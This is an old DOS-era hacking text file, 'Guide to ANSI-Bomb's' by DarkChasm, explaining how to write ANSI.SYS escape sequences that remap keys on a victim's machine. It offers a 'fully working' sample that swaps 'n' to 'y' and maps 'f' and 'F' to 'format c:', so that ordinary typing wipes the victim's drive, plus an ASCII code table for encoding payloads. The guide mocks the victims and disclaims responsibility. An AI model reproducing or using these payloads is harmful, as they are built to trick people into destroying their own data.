 ||||||||    |||||||||| ||||||||||| |||   |||  
 |||   |||   |||    ||| |||     ||| |||  |||
 |||    |||  |||    ||| |||     ||| ||| |||
 |||     ||| |||||||||| ||||||||||| ||||||
 |||    |||  |||    ||| |||    |||  ||| |||
 |||   |||   |||    ||| |||     ||| |||  |||
 ||||||||    |||    ||| |||     ||| |||   |||

 ||||||||||| |||    ||| |||||||||| |||||||||| ||||||||||||||||| ||| ||||||||||
 |||         |||    ||| |||    ||| |||        |||    |||    |||  || |||
 |||         |||    ||| |||    ||| |||        |||    |||    |||  |  |||
 |||         |||||||||| |||||||||| |||||||||| |||    |||    |||     ||||||||||
 |||         |||    ||| |||    |||        ||| |||    |||    |||            |||
 |||         |||    ||| |||    |||        ||| |||    |||    |||            |||
 ||||||||||| |||    ||| |||    ||| |||||||||| |||    |||    |||     ||||||||||

    **********************  GUIDE TO ANSI-BOMB'S  **********************

                                By DarkChasm

    ********************************************************************

    Disclaimer: I am not responsible for your actions. Pretty simple eh?

    ********************************************************************

     For the very first (and just about the most important) thing, you have
to have your ansi.sys driver loaded. To do this, just find it on your system
and in your config.sys file put at the end

 DEVICE=DRIVELETTER:\FOLDER\FOLDER\ANSI.SYS

Replace "DRIVELETTER" and the" FOLDER"s with the correct path.

     Many people don't know what an ansi-bomb is or what the do. This guide
is for all those people. When I first tried to learn I had to read some
txts from the 80's. Nothing worked, but I finally figured it out after looking
at many ansi-bomb's.

     To start out simple, ansi-bomb's just  reroute the keys on the keyboard.
For example you might write an ansi-bomb that replaces "a" with "format c:".
When some idiot ran the ansi-bomb, it wouldn't appear to do anything. The
next time they hit the "a" button, it would try to format their c: drive.
Most ansi-bombs are batch files although the best ansi-bombs are written as
an exe or com file.

     Ansi-bombs are really simple to make. There are just a few simple steps
you must take. First remember that all ansi-bombs must start with

     @ECHO ON

Go down to the next line. All ansi-bombs also must start with

[

That little arrow thing is important. It is why when I first started studying
ansi-bombs none would work. After that it is simple. Just put the hex number
or ascii number after the "[" of the key you want to replace. After that just
put a semi colan and then the hex letter followd by a few letters in regular
ascii or in hex.Put a colan and then "13p". If you want to redefine more keys
just start a new line and start typing.

If this is confusing just look at some examples down below

["a";"z";13p              ["f";"format c:";13p

is the same as             is the same as

[97;122;13p               [102;102;111;114;109;97;116;32;99;58;13p
                              ^   ^   ^   ^   ^   ^  ^   ^  ^  ^
                              f   f   o   r   m   a  t      c  :


Remember to put "@ECHO ON" as the first line in the ansi-bomb. An example of
a simple but fully working ansi-bomb is

@ECHO ON
[78;89;13p
[110;121;13p
[102;"format c:";13p
[70;"format c:";13p

That little bomb changes "n" to "y"  and "N" to "Y". It also changes "f" to
"format c:" and "F" to "format c:". 

     This is just a simple but informative lesson on how to make ansi-bombs.
Many people use ansi's to make pictures in DOS. Remember, you must be in DOS
for these to work. Have fun!

                            DarkChasm [SLAM]
                         darkchasm@hotmail.com
                  http://www.geocities.com/~darkchasm/                                           


                     ASCII TO HEX CONVERSION TABLE


!=33  "=34  #=35  $=36  %=37  &=38  '=39  (=40  )=41  *=42  +=43  -=45

/=47  0=48  1=49  2=50  3=51  4=52  5=53  6=54  7=55  8=56  9=57  :=58

;=59  <=60  ==61  >=62  ?=63  @=64  A=65  B=66  C=67  D=68  E=69  F=70

G=71  H=72  I=73  J=74  K=75  L=76  M=77  N=78  O=79  P=80  Q=81  R=82

S=83  T=84  U=85  V=86  W=87  X=88  Y=89  Z=90  [=91  \=92  ]=93  ^=94

_=95  a=97  b=98  c=99  d=100  e=101  f=102  g=103  h=104  i=105  j=106

k=107  l=108  m=109  n=110  o=111  p=112  q=113  r=114  s=115  t=116

u=117  v=118  w=119  x=120  y=121  z=122  {=123  |=124  }=125  ~=126
